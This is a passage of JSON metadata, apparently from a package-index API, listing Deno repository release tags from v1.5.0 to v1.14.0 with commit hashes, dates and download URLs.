ndency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0",